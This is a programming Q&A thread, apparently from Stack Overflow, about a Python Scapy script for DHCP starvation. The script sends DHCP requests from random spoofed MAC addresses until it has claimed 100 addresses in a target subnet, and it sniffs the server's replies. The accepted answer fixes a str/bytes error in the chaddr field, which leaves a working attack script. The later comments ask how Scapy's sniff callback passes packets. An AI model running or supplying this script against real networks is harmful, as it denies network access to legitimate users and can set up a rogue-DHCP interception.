# Scapy 2.4.4 - Py 3.7.9 - TypeError: can't concat str to bytes

Tags: python-3.x, scapy

I'm using Python 3.7.9.
I'm trying to use scapy by adapting the code found in this link (for the credits):

https://cabeggar.github.io/2016/02/21/DHCP-starvation-with-ScaPy/

```
    from scapy.all import *
from time import sleep
from threading import Thread




class DHCPStarvation(object):
    def __init__(self):
        # Generated MAC stored to avoid same MAC requesting for different IP
        self.mac = [""]
        # Requested IP stored to identify registered IP
        self.ip = []
    
    def get_intfs(self):
        winList = get_windows_if_list()
        intfList = get_if_list()
        
        # Pull guids and names from the windows list
        guidToNameDict = { e["guid"]: e["name"] for e in winList}
        
        # Extract the guids from the interface list
        guidsFromIntfList = [(e.split("_"))[1] for e in intfList]
        
        # Using the interface list of guids, pull the names from the
        # Windows map of guids to names
        namesAllowedList = [guidToNameDict.get(e) for e in guidsFromIntfList if guidToNameDict.get(e) != None]
        return namesAllowedList
    
    def choose_intf(self):
        intfs=self.get_intfs()
        a=len(intfs)+1
        print('Starting with a:',a)
        for i in intfs: print(intfs.index(i),i)
        while a > len(intfs)-1:
            a=int(input('Choose the interface from the list above:'))
        print('Returned:',intfs[a])
        return intfs[a]
    
    def handle_dhcp(self, pkt):
        if pkt[DHCP]:
            # if DHCP server reply ACK, the IP address requested is registered
            # 10.10.111.107 is IP for bt5, not to be starved
            if pkt[DHCP].options[0][1]==5 and pkt[IP].dst != "10.10.111.107":
                self.ip.append(pkt[IP].dst)
                print(str(pkt[IP].dst)+" registered")
            # Duplicate ACK may happen due to packet loss
            elif pkt[DHCP].options[0][1]==6:
                print("NAK received")
    
    def listen(self):
        # sniff DHCP packets
        sniff(filter="udp and (port 67 or port 68)",prn=self.handle_dhcp,store=0)
    
    def start(self):
        # start packet listening thread
        self.outgoing_intf = self.choose_intf()
        thread = Thread(target=self.listen)
        thread.start()
        print("Starting DHCP starvation...")
        # Keep starving until all 100 targets are registered
        # 100~200 excepts 107 = 100
        while len(self.ip) < 100: self.starve()
        print("Targeted IP address starved")
    
    def starve(self):
        for i in range(10):
            # generate IP we want to request
            # if IP already registered, then skip
            requested_addr = "10.38.65."+str(176+i)
            print('Requesting',requested_addr)
            if requested_addr in self.ip:
                continue            
            # generate MAC, avoid duplication
            src_mac = ""
            while src_mac in self.mac:
                src_mac = str(RandMAC('16'))
            self.mac.append(src_mac)
            # generate DHCP request packet
            pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
            pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
            pkt /= UDP(sport=68, dport=67)
            pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
            pkt /= DHCP(options=[("message-type", "request"),
                                 ("requested_addr", requested_addr),
                                 ("server_id", "10.38.65.201"),
                                 "end"])
            sendp(pkt,iface=self.outgoing_intf)
            print("Trying to occupy "+requested_addr)
            sleep(0.2)  # interval to avoid congestion and packet loss
        

if __name__ == "__main__":
    starvation = DHCPStarvation()
    starvation.start()
```

I get this error

```
Traceback (most recent call last):
  File ".\main.py", line 95, in <module>
    starvation.start()
  File ".\main.py", line 63, in start
    while len(self.ip) < 100: self.starve()
  File ".\main.py", line 88, in starve
    sendp(pkt,iface=self.outgoing_intf)
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\sendrecv.py", line 379, in sendp
    realtime=realtime, return_packets=return_packets)
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\sendrecv.py", line 299, in __gen_send
    for p in x:
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 963, in loop
    for x in loop(todo[:], done):
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 963, in loop
    for x in loop(todo[:], done):
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 971, in loop
    if self.fields == done and payloads.__iterlen__() == 1:
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 1026, in __iterlen__
    return length * self.payload.__iterlen__()
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 1026, in __iterlen__
    return length * self.payload.__iterlen__()
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\packet.py", line 1009, in __iterlen__
    if hasattr(val, "__iterlen__"):
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\volatile.py", line 104, in __getattr__
    return getattr(self._fix(), attr)
  File "C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\volatile.py", line 365, in _fix
    s += rdm_chr if isinstance(rdm_chr, str) else chb(rdm_chr)
TypeError: can't concat str to bytes
```

The problem seems to be deep in the modules and specifically here in the function def _fix(self) in the file

"C:\Program Files\Python37\lib\site-packages\scapy-2.4.4rc2.dev30-py3.7.egg\scapy\volatile.py"

```
class RandString(RandField):
def __init__(self, size=None, chars=b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"):  # noqa: E501
    if size is None:
        size = RandNumExpo(0.01)
    self.size = size
    self.chars = chars

def _fix(self):
    s = b""
    for _ in range(self.size):
        rdm_chr = random.choice(self.chars)
        s += rdm_chr if isinstance(rdm_chr, str) else chb(rdm_chr)
    return s

def __str__(self):
    return plain_str(self._fix())

def __bytes__(self):
    return bytes_encode(self._fix())

def __mul__(self, n):
    return self._fix() * n
```

The problem seems to be due to the fact that **s** and **rdm_chr** are of different type but I cannot believe such an error can be found so deep in long maintained modules...

Would anyone have any hint?

Thanks,

Alex

Answer (score 1, accepted):

First of all I'm slightly skeptical that

```
BOOTP(chaddr=RandString(12, "0123456789abcdef"))
```

is correct because `chaddr` is a 16-bytes field (and not 12), but the issue here is that you're giving it a string (yes it's counter intuitive but this is python 3), instead of bytes:

```
BOOTP(chaddr=RandString(16, b"0123456789abcdef"))
```

Comment: Thanks! It doesn't hung any more! :-)

Comment: I would have another question if you wouldn't mind, I don't know if I can use this question. It's a about the def sniff that calls handle_dhcp.. I wonder where the handle_dhcp gets the data for pkt once it's called by sniff. Would you have a hint for me please?

Comment: When you use the `prn` argument in sniff, it calls the function with a packet as parameter. Not sure i understand your question

Comment: "it calls the function with a packet as parameter", besides knowing this because you know Python how the heck can you say that by reading the code? That's what I wonder of :-)

Comment: You need to have a look at scapy's documentation on: https://scapy.readthedocs.io/en/latest/